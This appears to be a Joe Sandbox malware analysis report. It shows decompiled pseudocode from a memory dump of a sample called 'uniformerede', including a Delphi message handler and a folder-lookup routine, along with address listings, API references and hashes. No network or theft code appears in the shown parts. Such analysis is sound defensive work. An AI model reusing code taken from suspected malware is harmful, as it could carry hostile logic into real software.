												_t375 = GetProcAddress( *(_v8 + 0xa0), "RegisterAutomation");
												_t315 = _t375;
												__eflags = _t375;
												if(_t375 != 0) {
													_t269 =  *(_v12 + 8);
													_t315->i( *((intOrPtr*)(_t269 + 4)),  *((intOrPtr*)(_t269 + 8)));
												}
											}
										}
									}
								}
								goto L102;
							} else {
								goto L101;
							}
						}
						if(__eflags == 0) {
							_t272 =  *0x49ebbc; // 0x0
							E00458DEC(_t272);
							E004598AC(_t377);
							goto L102;
						}
						_t275 = _t161 - 0x1a;
						__eflags = _t275;
						if(_t275 == 0) {
							_t276 =  *0x49ddb0; // 0x49eb18
							E00445ED0( *_t276, _t317,  *(_v12 + 4));
							E00459840(_v8, _t308, _t317, _v12, _t370);
							E004598AC(_t377);
							goto L102;
						}
						__eflags = _t275 == 2;
						if(_t275 == 2) {
							E004598AC(_t377);
							_t284 = _v12;
							__eflags =  *((intOrPtr*)(_t284 + 4)) - 1;
							asm("sbb eax, eax");
							 *((char*)(_v8 + 0x9d)) = _t284 + 1;
							_t286 = _v12;
							__eflags =  *(_t286 + 4);
							if( *(_t286 + 4) == 0) {
								E0045973C();
								PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0);
							} else {
								E0045974C(_v8);
								PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0);
							}
							goto L102;
						} else {
							goto L101;
						}
					}
					if(__eflags == 0) {
						_t297 = _v12;
						__eflags =  *(_t297 + 4);
						if( *(_t297 + 4) != 0) {
							 *((char*)(_v8 + 0x9c)) = 1;
						}
						goto L102;
					}
					__eflags = _t161 - 0x14;
					if(_t161 > 0x14) {
						goto L101;
					}
					switch( *((intOrPtr*)(_t161 * 4 +  &M004599D8))) {
						case 0:
							0 = E004214B8(0, __ebx, __edi, __esi);
							goto L102;
						case 1:
							goto L101;
						case 2:
							_push(0);
							_push(0);
							_push(0xb01a);
							_v8 =  *(_v8 + 0x30);
							_push( *(_v8 + 0x30));
							L00407848();
							__eax = E004598AC(__ebp);
							goto L102;
						case 3:
							__eax = _v12;
							__eflags =  *(__eax + 4);
							if( *(__eax + 4) == 0) {
								__eax = E004598AC(__ebp);
								__eax = _v8;
								__eflags =  *(__eax + 0xac);
								if( *(__eax + 0xac) == 0) {
									__eax = _v8;
									__eax =  *(_v8 + 0x30);
									__eax = E00451600( *(_v8 + 0x30), __ebx, __edi, __esi);
									__edx = _v8;
									 *(_v8 + 0xac) = __eax;
								}
								_v8 = L00459744();
							} else {
								_v8 = E0045974C(_v8);
								__eax = _v8;
								__eax =  *(_v8 + 0xac);
								__eflags = __eax;
								if(__eax != 0) {
									__eax = _v8;
									__edx = 0;
									__eflags = 0;
									 *(_v8 + 0xac) = 0;
								}
								__eax = E004598AC(__ebp);
							}
							goto L102;
						case 4:
							__eax = _v8;
							__eax =  *(_v8 + 0x30);
							_push(__eax);
							L004077A8();
							__eflags = __eax;
							if(__eax == 0) {
								__eax = E004598AC(__ebp);
							} else {
								__eax = E004598E8(__ebp);
							}
							goto L102;
						case 5:
							__eax = _v8;
							__eax =  *(_v8 + 0x44);
							__eflags = __eax;
							if(__eax != 0) {
								__eax = E00456FEC(__eax, __ecx);
							}
							goto L102;
						case 6:
							__eax = _v12;
							 *_v12 = 0x27;
							__eax = E004598AC(__ebp);
							goto L102;
					}
				} else {
					_t316 = _t306 + 1;
					_t376 = 0;
					L2:
					L2:
					if( *((intOrPtr*)(E0041AC6C( *((intOrPtr*)(_v8 + 0xa8)), _t376)))() == 0) {
						goto L4;
					} else {
						_t166 = 0;
						_pop(_t366);
						 *[fs:eax] = _t366;
					}
					L103:
					return _t166;
					L4:
					_t376 = _t376 + 1;
					_t316 = _t316 - 1;
					__eflags = _t316;
					if(_t316 != 0) {
						goto L2;
					}
					goto L5;
				}
			}























































                                                                                                                                                                                                                            0x00459934
                                                                                                                                                                                                                            0x0045993b
                                                                                                                                                                                                                            0x0045993d
                                                                                                                                                                                                                            0x00459940
                                                                                                                                                                                                                            0x00459945
                                                                                                                                                                                                                            0x00459946
                                                                                                                                                                                                                            0x0045994b
                                                                                                                                                                                                                            0x0045994e
                                                                                                                                                                                                                            0x00459956
                                                                                                                                                                                                                            0x00459965
                                                                                                                                                                                                                            0x00459968
                                                                                                                                                                                                                            0x0045999c
                                                                                                                                                                                                                            0x004599a2
                                                                                                                                                                                                                            0x004599aa
                                                                                                                                                                                                                            0x004599ac
                                                                                                                                                                                                                            0x004599ae
                                                                                                                                                                                                                            0x004599b1
                                                                                                                                                                                                                            0x00459a65
                                                                                                                                                                                                                            0x00459a6a
                                                                                                                                                                                                                            0x00459abb
                                                                                                                                                                                                                            0x00459ac0
                                                                                                                                                                                                                            0x00459ae1
                                                                                                                                                                                                                            0x00459ae1
                                                                                                                                                                                                                            0x00459ae6
                                                                                                                                                                                                                            0x00459f56
                                                                                                                                                                                                                            0x00459f59
                                                                                                                                                                                                                            0x00459f5d
                                                                                                                                                                                                                            0x00459f79
                                                                                                                                                                                                                            0x00459f5f
                                                                                                                                                                                                                            0x00459f6b
                                                                                                                                                                                                                            0x00459f6b
                                                                                                                                                                                                                            0x00459fe4
                                                                                                                                                                                                                            0x00459fe4
                                                                                                                                                                                                                            0x00459fe6
                                                                                                                                                                                                                            0x00459fe9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459fe9
                                                                                                                                                                                                                            0x00459aef
                                                                                                                                                                                                                            0x00459af2
                                                                                                                                                                                                                            0x00459db1
                                                                                                                                                                                                                            0x00459af8
                                                                                                                                                                                                                            0x00459fdd
                                                                                                                                                                                                                            0x00459fde
                                                                                                                                                                                                                            0x00459fe3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459af2
                                                                                                                                                                                                                            0x00459ac2
                                                                                                                                                                                                                            0x00459f1d
                                                                                                                                                                                                                            0x00459f20
                                                                                                                                                                                                                            0x00459f24
                                                                                                                                                                                                                            0x00459f4c
                                                                                                                                                                                                                            0x00459f26
                                                                                                                                                                                                                            0x00459f34
                                                                                                                                                                                                                            0x00459f34
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459f24
                                                                                                                                                                                                                            0x00459ac8
                                                                                                                                                                                                                            0x00459ac8
                                                                                                                                                                                                                            0x00459acd
                                                                                                                                                                                                                            0x00459ecb
                                                                                                                                                                                                                            0x00459ed0
                                                                                                                                                                                                                            0x00459ed2
                                                                                                                                                                                                                            0x00459ed8
                                                                                                                                                                                                                            0x00459edd
                                                                                                                                                                                                                            0x00459ee0
                                                                                                                                                                                                                            0x00459ee3
                                                                                                                                                                                                                            0x00459eeb
                                                                                                                                                                                                                            0x00459ef0
                                                                                                                                                                                                                            0x00459ef2
                                                                                                                                                                                                                            0x00459ef9
                                                                                                                                                                                                                            0x00459ef9
                                                                                                                                                                                                                            0x00459ef2
                                                                                                                                                                                                                            0x00459ee3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459ed2
                                                                                                                                                                                                                            0x00459ad3
                                                                                                                                                                                                                            0x00459ad6
                                                                                                                                                                                                                            0x00459f03
                                                                                                                                                                                                                            0x00459f13
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459adc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459adc
                                                                                                                                                                                                                            0x00459ad6
                                                                                                                                                                                                                            0x00459a6c
                                                                                                                                                                                                                            0x00459dde
                                                                                                                                                                                                                            0x00459de1
                                                                                                                                                                                                                            0x00459de3
                                                                                                                                                                                                                            0x00459de9
                                                                                                                                                                                                                            0x00459ded
                                                                                                                                                                                                                            0x00459df2
                                                                                                                                                                                                                            0x00459df4
                                                                                                                                                                                                                            0x00459e02
                                                                                                                                                                                                                            0x00459e07
                                                                                                                                                                                                                            0x00459e09
                                                                                                                                                                                                                            0x00459e17
                                                                                                                                                                                                                            0x00459e1c
                                                                                                                                                                                                                            0x00459e1e
                                                                                                                                                                                                                            0x00459e24
                                                                                                                                                                                                                            0x00459e2b
                                                                                                                                                                                                                            0x00459e3a
                                                                                                                                                                                                                            0x00459e53
                                                                                                                                                                                                                            0x00459e59
                                                                                                                                                                                                                            0x00459e5e
                                                                                                                                                                                                                            0x00459e68
                                                                                                                                                                                                                            0x00459e68
                                                                                                                                                                                                                            0x00459e1e
                                                                                                                                                                                                                            0x00459e09
                                                                                                                                                                                                                            0x00459df4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459de3
                                                                                                                                                                                                                            0x00459a72
                                                                                                                                                                                                                            0x00459a77
                                                                                                                                                                                                                            0x00459aa2
                                                                                                                                                                                                                            0x00459aa2
                                                                                                                                                                                                                            0x00459aa7
                                                                                                                                                                                                                            0x00459e9c
                                                                                                                                                                                                                            0x00459e9f
                                                                                                                                                                                                                            0x00459ea7
                                                                                                                                                                                                                            0x00459eb9
                                                                                                                                                                                                                            0x00459eb9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459ea7
                                                                                                                                                                                                                            0x00459aad
                                                                                                                                                                                                                            0x00459ab0
                                                                                                                                                                                                                            0x00459dbf
                                                                                                                                                                                                                            0x00459dc4
                                                                                                                                                                                                                            0x00459dc6
                                                                                                                                                                                                                            0x00459dcf
                                                                                                                                                                                                                            0x00459dcf
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459ab6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459ab6
                                                                                                                                                                                                                            0x00459ab0
                                                                                                                                                                                                                            0x00459a79
                                                                                                                                                                                                                            0x00459e74
                                                                                                                                                                                                                            0x00459e77
                                                                                                                                                                                                                            0x00459e7f
                                                                                                                                                                                                                            0x00459e91
                                                                                                                                                                                                                            0x00459e91
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459e7f
                                                                                                                                                                                                                            0x00459a7f
                                                                                                                                                                                                                            0x00459a7f
                                                                                                                                                                                                                            0x00459a84
                                                                                                                                                                                                                            0x00459b08
                                                                                                                                                                                                                            0x00459b08
                                                                                                                                                                                                                            0x00459b0d
                                                                                                                                                                                                                            0x00459b1b
                                                                                                                                                                                                                            0x00459b0f
                                                                                                                                                                                                                            0x00459b0f
                                                                                                                                                                                                                            0x00459b14
                                                                                                                                                                                                                            0x00459b28
                                                                                                                                                                                                                            0x00459b16
                                                                                                                                                                                                                            0x00459b33
                                                                                                                                                                                                                            0x00459b38
                                                                                                                                                                                                                            0x00459b14
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459b0d
                                                                                                                                                                                                                            0x00459a89
                                                                                                                                                                                                                            0x00459a89
                                                                                                                                                                                                                            0x00459a8c
                                                                                                                                                                                                                            0x00459cc0
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459cc0
                                                                                                                                                                                                                            0x00459a92
                                                                                                                                                                                                                            0x00459a97
                                                                                                                                                                                                                            0x00459fbf
                                                                                                                                                                                                                            0x00459fc4
                                                                                                                                                                                                                            0x00459fc6
                                                                                                                                                                                                                            0x00459fcd
                                                                                                                                                                                                                            0x00459fcd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459a9d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459a9d
                                                                                                                                                                                                                            0x00459a97
                                                                                                                                                                                                                            0x004599b7
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004599bd
                                                                                                                                                                                                                            0x004599c0
                                                                                                                                                                                                                            0x00459a2c
                                                                                                                                                                                                                            0x00459a2f
                                                                                                                                                                                                                            0x00459a4e
                                                                                                                                                                                                                            0x00459a4e
                                                                                                                                                                                                                            0x00459a51
                                                                                                                                                                                                                            0x00459b9e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459b9e
                                                                                                                                                                                                                            0x00459a57
                                                                                                                                                                                                                            0x00459a5a
                                                                                                                                                                                                                            0x00459ce4
                                                                                                                                                                                                                            0x00459cea
                                                                                                                                                                                                                            0x00459cf0
                                                                                                                                                                                                                            0x00459cf6
                                                                                                                                                                                                                            0x00459cf9
                                                                                                                                                                                                                            0x00459d00
                                                                                                                                                                                                                            0x00459d06
                                                                                                                                                                                                                            0x00459d09
                                                                                                                                                                                                                            0x00459d10
                                                                                                                                                                                                                            0x00459d90
                                                                                                                                                                                                                            0x00459d12
                                                                                                                                                                                                                            0x00459d21
                                                                                                                                                                                                                            0x00459d26
                                                                                                                                                                                                                            0x00459d2c
                                                                                                                                                                                                                            0x00459d2e
                                                                                                                                                                                                                            0x00459d78
                                                                                                                                                                                                                            0x00459d80
                                                                                                                                                                                                                            0x00459d30
                                                                                                                                                                                                                            0x00459d35
                                                                                                                                                                                                                            0x00459d4c
                                                                                                                                                                                                                            0x00459d4e
                                                                                                                                                                                                                            0x00459d50
                                                                                                                                                                                                                            0x00459d52
                                                                                                                                                                                                                            0x00459d5b
                                                                                                                                                                                                                            0x00459d69
                                                                                                                                                                                                                            0x00459d69
                                                                                                                                                                                                                            0x00459d52
                                                                                                                                                                                                                            0x00459d2e
                                                                                                                                                                                                                            0x00459d10
                                                                                                                                                                                                                            0x00459d00
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459a60
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459a60
                                                                                                                                                                                                                            0x00459a5a
                                                                                                                                                                                                                            0x00459a31
                                                                                                                                                                                                                            0x00459fa7
                                                                                                                                                                                                                            0x00459fac
                                                                                                                                                                                                                            0x00459fb2
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459fb7
                                                                                                                                                                                                                            0x00459a37
                                                                                                                                                                                                                            0x00459a37
                                                                                                                                                                                                                            0x00459a3a
                                                                                                                                                                                                                            0x00459f87
                                                                                                                                                                                                                            0x00459f8e
                                                                                                                                                                                                                            0x00459f99
                                                                                                                                                                                                                            0x00459f9f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459fa4
                                                                                                                                                                                                                            0x00459a40
                                                                                                                                                                                                                            0x00459a43
                                                                                                                                                                                                                            0x00459bc8
                                                                                                                                                                                                                            0x00459bce
                                                                                                                                                                                                                            0x00459bd1
                                                                                                                                                                                                                            0x00459bd5
                                                                                                                                                                                                                            0x00459bdb
                                                                                                                                                                                                                            0x00459be1
                                                                                                                                                                                                                            0x00459be4
                                                                                                                                                                                                                            0x00459be8
                                                                                                                                                                                                                            0x00459c0f
                                                                                                                                                                                                                            0x00459c24
                                                                                                                                                                                                                            0x00459bea
                                                                                                                                                                                                                            0x00459bed
                                                                                                                                                                                                                            0x00459c02
                                                                                                                                                                                                                            0x00459c02
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459a49
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459a49
                                                                                                                                                                                                                            0x00459a43
                                                                                                                                                                                                                            0x004599c2
                                                                                                                                                                                                                            0x00459cc8
                                                                                                                                                                                                                            0x00459ccb
                                                                                                                                                                                                                            0x00459ccf
                                                                                                                                                                                                                            0x00459cd8
                                                                                                                                                                                                                            0x00459cd8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459ccf
                                                                                                                                                                                                                            0x004599c8
                                                                                                                                                                                                                            0x004599cb
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004599d1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459fd6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459ba6
                                                                                                                                                                                                                            0x00459ba8
                                                                                                                                                                                                                            0x00459baa
                                                                                                                                                                                                                            0x00459bb2
                                                                                                                                                                                                                            0x00459bb5
                                                                                                                                                                                                                            0x00459bb6
                                                                                                                                                                                                                            0x00459bbc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459c2e
                                                                                                                                                                                                                            0x00459c31
                                                                                                                                                                                                                            0x00459c35
                                                                                                                                                                                                                            0x00459c69
                                                                                                                                                                                                                            0x00459c6f
                                                                                                                                                                                                                            0x00459c72
                                                                                                                                                                                                                            0x00459c79
                                                                                                                                                                                                                            0x00459c7b
                                                                                                                                                                                                                            0x00459c7e
                                                                                                                                                                                                                            0x00459c81
                                                                                                                                                                                                                            0x00459c86
                                                                                                                                                                                                                            0x00459c89
                                                                                                                                                                                                                            0x00459c89
                                                                                                                                                                                                                            0x00459c92
                                                                                                                                                                                                                            0x00459c37
                                                                                                                                                                                                                            0x00459c3a
                                                                                                                                                                                                                            0x00459c3f
                                                                                                                                                                                                                            0x00459c42
                                                                                                                                                                                                                            0x00459c48
                                                                                                                                                                                                                            0x00459c4a
                                                                                                                                                                                                                            0x00459c51
                                                                                                                                                                                                                            0x00459c54
                                                                                                                                                                                                                            0x00459c54
                                                                                                                                                                                                                            0x00459c56
                                                                                                                                                                                                                            0x00459c56
                                                                                                                                                                                                                            0x00459c5d
                                                                                                                                                                                                                            0x00459c62
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459b56
                                                                                                                                                                                                                            0x00459b59
                                                                                                                                                                                                                            0x00459b5c
                                                                                                                                                                                                                            0x00459b5d
                                                                                                                                                                                                                            0x00459b62
                                                                                                                                                                                                                            0x00459b64
                                                                                                                                                                                                                            0x00459b73
                                                                                                                                                                                                                            0x00459b66
                                                                                                                                                                                                                            0x00459b67
                                                                                                                                                                                                                            0x00459b6c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459b3e
                                                                                                                                                                                                                            0x00459b41
                                                                                                                                                                                                                            0x00459b44
                                                                                                                                                                                                                            0x00459b46
                                                                                                                                                                                                                            0x00459b4c
                                                                                                                                                                                                                            0x00459b4c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459b7e
                                                                                                                                                                                                                            0x00459b81
                                                                                                                                                                                                                            0x00459b88
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045996a
                                                                                                                                                                                                                            0x0045996a
                                                                                                                                                                                                                            0x0045996b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045996d
                                                                                                                                                                                                                            0x00459989
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045998b
                                                                                                                                                                                                                            0x0045998b
                                                                                                                                                                                                                            0x0045998d
                                                                                                                                                                                                                            0x00459990
                                                                                                                                                                                                                            0x00459990
                                                                                                                                                                                                                            0x0045a003
                                                                                                                                                                                                                            0x0045a009
                                                                                                                                                                                                                            0x00459998
                                                                                                                                                                                                                            0x00459998
                                                                                                                                                                                                                            0x00459999
                                                                                                                                                                                                                            0x00459999
                                                                                                                                                                                                                            0x0045999a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045999a

                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: RegisterAutomation$vcltest3.dll
                                                                                                                                                                                                                            • API String ID: 0-2963190186
                                                                                                                                                                                                                            • Opcode ID: 81692a346c510cd3cab428a03d42892663644badc2aea56474423a5a3e502603
                                                                                                                                                                                                                            • Instruction ID: 239074f197e96bcf26dda039fa981a1902ebc25ef421ca5b27d2001906572362
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 81692a346c510cd3cab428a03d42892663644badc2aea56474423a5a3e502603
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A4E13C36A04205EFDB40DB69C585A9EB7B5BF04315F2481ABE804DB353C738EE49DB49
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004730FC Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139libraryloaderCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            C-Code - Quality: 54%
                                                                                                                                                                                                                            			E004730FC(signed int __eax, void* __ebx, int __edx, void* __edi, void* __esi) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				char _v273;
				char _v280;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				signed int _t29;
				int _t59;
				int _t63;
				intOrPtr* _t81;
				signed int _t84;
				int _t91;
				intOrPtr _t93;
				intOrPtr _t100;
				intOrPtr* _t108;
				void* _t110;
				void* _t111;
				intOrPtr _t112;

				_t91 = __edx;
				_t29 = __eax;
				_t110 = _t111;
				_t112 = _t111 + 0xfffffed0;
				_v308 = 0;
				_v304 = 0;
				_v300 = 0;
				_v280 = 0;
				_t81 = __edx;
				_push(_t110);
				_push(0x473306);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t112;
				_t84 = __eax;
				if(__eax > 6) {
					L8:
					if(_t29 != 7) {
						SHGetSpecialFolderLocation(0, _t91,  &_v8); // executed
						SHGetPathFromIDList(_v8,  &_v273);
						E0040A174( &_v273, _t81);
					} else {
						_push(_t110);
						_push(0x4732a8);
						_push( *[fs:eax]);
						 *[fs:eax] = _t112;
						E00472EF0( &_v280, _t81, _t84, 0);
						E00404DCC(_v280, 0x47331c);
						if(0 == 0) {
							SHGetSpecialFolderLocation(0, 5,  &_v8);
							SHGetPathFromIDList(_v8,  &_v273);
							E0040A174( &_v273,  &_v300);
							E00409D30(_v300, _t81);
							E00404CCC( &_v304, "\\Downloads",  *_t81);
							_t59 = E00409A58(_v304);
							__eflags = _t59;
							if(_t59 == 0) {
								E00404CCC( &_v308, 0x473390,  *_t81);
								_t63 = E00409A58(_v308);
								__eflags = _t63;
								if(_t63 == 0) {
									E004049C0(_t81);
								} else {
									E00404C88(_t81, 0x473390);
								}
							} else {
								E00404C88(_t81, "\\Downloads");
							}
						} else {
							_t108 = GetProcAddress(LoadLibraryA("shell32.dll"), "SHGetKnownFolderPath");
							E00408CA8("{374DE290-123F-4565-9164-39C4925E467B}", _t81,  &_v296, _t108, 0);
							 *_t108( &_v296, 0, 0,  &_v12);
							E00404BE8(_t81, _v12);
						}
						_pop(_t100);
						 *[fs:eax] = _t100;
					}
					_pop(_t93);
					 *[fs:eax] = _t93;
					_push(0x47330d);
					E004049E4( &_v308, 3);
					return E004049C0( &_v280);
				}
				switch( *((intOrPtr*)(__eax * 4 +  &M00473140))) {
					case 0:
						goto L8;
					case 1:
						_t91 = 0x1a;
						goto L8;
					case 2:
						__edx = 0x1c;
						goto L8;
					case 3:
						__edx = 0x23;
						goto L8;
					case 4:
						__edx = 0x2e;
						goto L8;
					case 5:
						__edx = 5;
						goto L8;
					case 6:
						__edx = 0;
						__eflags = 0;
						goto L8;
				}
			}























                                                                                                                                                                                                                            0x004730fc
                                                                                                                                                                                                                            0x004730fc
                                                                                                                                                                                                                            0x004730fd
                                                                                                                                                                                                                            0x004730ff
                                                                                                                                                                                                                            0x0047310a
                                                                                                                                                                                                                            0x00473110
                                                                                                                                                                                                                            0x00473116
                                                                                                                                                                                                                            0x0047311c
                                                                                                                                                                                                                            0x00473122
                                                                                                                                                                                                                            0x00473126
                                                                                                                                                                                                                            0x00473127
                                                                                                                                                                                                                            0x0047312c
                                                                                                                                                                                                                            0x0047312f
                                                                                                                                                                                                                            0x00473132
                                                                                                                                                                                                                            0x00473137
                                                                                                                                                                                                                            0x00473181
                                                                                                                                                                                                                            0x00473184
                                                                                                                                                                                                                            0x004732bb
                                                                                                                                                                                                                            0x004732cb
                                                                                                                                                                                                                            0x004732d8
                                                                                                                                                                                                                            0x0047318a
                                                                                                                                                                                                                            0x0047318c
                                                                                                                                                                                                                            0x0047318d
                                                                                                                                                                                                                            0x00473192
                                                                                                                                                                                                                            0x00473195
                                                                                                                                                                                                                            0x0047319e
                                                                                                                                                                                                                            0x004731ae
                                                                                                                                                                                                                            0x004731b3
                                                                                                                                                                                                                            0x00473206
                                                                                                                                                                                                                            0x00473216
                                                                                                                                                                                                                            0x00473227
                                                                                                                                                                                                                            0x00473234
                                                                                                                                                                                                                            0x00473246
                                                                                                                                                                                                                            0x00473251
                                                                                                                                                                                                                            0x00473256
                                                                                                                                                                                                                            0x00473258
                                                                                                                                                                                                                            0x00473275
                                                                                                                                                                                                                            0x00473280
                                                                                                                                                                                                                            0x00473285
                                                                                                                                                                                                                            0x00473287
                                                                                                                                                                                                                            0x00473299
                                                                                                                                                                                                                            0x00473289
                                                                                                                                                                                                                            0x00473290
                                                                                                                                                                                                                            0x00473290
                                                                                                                                                                                                                            0x0047325a
                                                                                                                                                                                                                            0x00473261
                                                                                                                                                                                                                            0x00473261
                                                                                                                                                                                                                            0x004731b5
                                                                                                                                                                                                                            0x004731cc
                                                                                                                                                                                                                            0x004731e1
                                                                                                                                                                                                                            0x004731ed
                                                                                                                                                                                                                            0x004731f4
                                                                                                                                                                                                                            0x004731f4
                                                                                                                                                                                                                            0x004732a0
                                                                                                                                                                                                                            0x004732a3
                                                                                                                                                                                                                            0x004732a3
                                                                                                                                                                                                                            0x004732df
                                                                                                                                                                                                                            0x004732e2
                                                                                                                                                                                                                            0x004732e5
                                                                                                                                                                                                                            0x004732f5
                                                                                                                                                                                                                            0x00473305
                                                                                                                                                                                                                            0x00473305
                                                                                                                                                                                                                            0x00473139
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0047315c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00473163
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0047316a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00473171
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00473178
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0047317f
                                                                                                                                                                                                                            0x0047317f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(shell32.dll,00000000,004732A8,?,00000000,00473306), ref: 004731BA
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 004731C7
                                                                                                                                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000005,?,00000000,004732A8,?,00000000,00473306), ref: 00473206
                                                                                                                                                                                                                            • SHGetPathFromIDList.SHELL32(?,?), ref: 00473216
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressFolderFromLibraryListLoadLocationPathProcSpecial
                                                                                                                                                                                                                            • String ID: SHGetKnownFolderPath$\Downloads$shell32.dll${374DE290-123F-4565-9164-39C4925E467B}
                                                                                                                                                                                                                            • API String ID: 2341558874-1676591009
                                                                                                                                                                                                                            • Opcode ID: ceb5cd3c2f7c68d7676a2a85ae2993d6271a5020a26987a0caa0ce5203d03466
                                                                                                                                                                                                                            • Instruction ID: 6a38066a99e998b0feb9dfcd70d0f28be743192f9ebabe66a089855190f33de3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ceb5cd3c2f7c68d7676a2a85ae2993d6271a5020a26987a0caa0ce5203d03466
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9741C970B04118ABD720EF65DC42BDE73B9EB48705F5084BBB90CA7681DA3C9F419A1E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

